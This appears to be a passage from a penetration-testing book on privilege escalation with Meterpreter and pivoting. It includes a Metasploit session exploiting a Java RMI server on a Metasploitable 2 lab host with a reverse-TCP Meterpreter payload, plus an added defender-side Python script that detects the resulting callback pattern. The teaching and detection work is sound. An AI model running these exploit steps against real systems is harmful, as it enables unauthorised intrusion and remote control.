There are other ways to escalate your privileges. One way, if you have a Meterpreter shell, is to use the built-in command getsystem. This command attempts different strategies to escalate your privileges to those of SYSTEM. This access will get you complete control of your target system. You are not guaranteed to get SYSTEM privileges by using getsystem. It depends on the access and permissions of the user you are connected as. One technique is to grab a token and attempt to use that to get higher permissions.
Pivoting to Other Networks
While desktop systems are commonly connected to a single network using just one network interface, servers are often connected to multiple networks in order to isolate traffic. You don't, for instance, want your administrative traffic passing over the front-side interface. The front-side interface is the one where external traffic comes in, meaning it's the interface that users use to connect to the service. If we isolate administrative traffic to another interface for performance or security purposes, now we have two interfaces and two networks. The administrative network is not going to be directly accessible from the outside world, but it will typically have backend access to many other systems that are also being administered.
We can use a compromised system to function as a router. One of the easiest ways to do this is to use Meterpreter and run one of the modules available to help us. The first thing we need to do is compromise a system with an exploit that allows a Meterpreter payload. We're going after the Metasploitable 2 system again, but the distcc exploit doesn't support the Meterpreter payload. Instead, we're going to use a Java RMI server vulnerability. RMI is functionality that lets one application call a method or function on a remote system. This allows for distributed computing and for applications to use services they may not directly support themselves. Example 6-18 shows running the exploit, including selecting the Java-based Meterpreter payload.
Example 6-18. Exploiting Java RMI server
msf > use exploit/multi/misc/java_rmi_server
msf exploit(multi/misc/java_rmi_server) > set RHOST 192.168.86.47
RHOST => 192.168.86.47
msf exploit(multi/misc/java_rmi_server) > set PAYLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf exploit(multi/misc/java_rmi_server) > set LHOST 192.168.86.30
LHOST => 192.168.86.30
msf exploit(multi/misc/java_rmi_server) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.86.30:4444
msf exploit(multi/misc/java_rmi_server) >
[*] 192.168.86.47:1099 - Using URL: http://0.0.0.0:8080/wSlukgkQzlH3lj
[*] 192.168.86.47:1099 - Local IP: http://192.168.86.30:8080/wSlukgkQzlH3lj
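Seen from the defender's side, the session in Example 6-18 leaves a distinctive footprint: an inbound connection to the RMI registry on TCP 1099, then the victim reaching back to the same peer to fetch a class over HTTP (port 8080 here) and to open the reverse Meterpreter channel (port 4444). The following correlation script is an added example, not code from the book; its log format and sample connection records are constructed for illustration, and the 60-second window is an assumed tuning value.

```python
# Flag hosts that accept an RMI registry connection (TCP 1099) and then, within
# a short window, connect back to the same peer: the callback pattern of a
# remote class load followed by a reverse shell. Log format is constructed.
from datetime import datetime, timedelta

RMI_PORT = 1099
WINDOW = timedelta(seconds=60)  # assumed tuning value

# Constructed sample: "timestamp src:port -> dst:port", one flow per line.
SAMPLE_LOG = """\
2024-01-01T10:00:00 192.168.86.30:51000 -> 192.168.86.47:1099
2024-01-01T10:00:01 192.168.86.47:40001 -> 192.168.86.30:8080
2024-01-01T10:00:02 192.168.86.47:40002 -> 192.168.86.30:4444
2024-01-01T10:05:00 192.168.86.12:51555 -> 192.168.86.47:1099
2024-01-01T10:30:00 192.168.86.47:40010 -> 192.168.86.5:443
"""

def parse_flow(line):
    """Split one log line into (timestamp, src_ip, src_port, dst_ip, dst_port)."""
    ts, src, _arrow, dst = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), sip, int(sport), dip, int(dport)

def find_rmi_callbacks(log):
    """Return (victim, peer, callback_ports) for every RMI connection that is
    followed within WINDOW by the victim connecting back to the same peer."""
    flows = [parse_flow(l) for l in log.splitlines() if l.strip()]
    hits = []
    for ts, sip, _sport, dip, dport in flows:
        if dport != RMI_PORT:
            continue
        callbacks = sorted(
            cb_dport
            for cb_ts, cb_sip, _cb_sport, cb_dip, cb_dport in flows
            if cb_sip == dip and cb_dip == sip and ts < cb_ts <= ts + WINDOW
        )
        if callbacks:
            hits.append((dip, sip, callbacks))
    return hits

if __name__ == "__main__":
    for victim, peer, ports in find_rmi_callbacks(SAMPLE_LOG):
        print(f"{victim} took RMI from {peer} then called back on {ports}")
```

The lone 10:05 connection to port 1099 produces no alert because the victim never connects back to that peer, which keeps ordinary RMI clients out of the results.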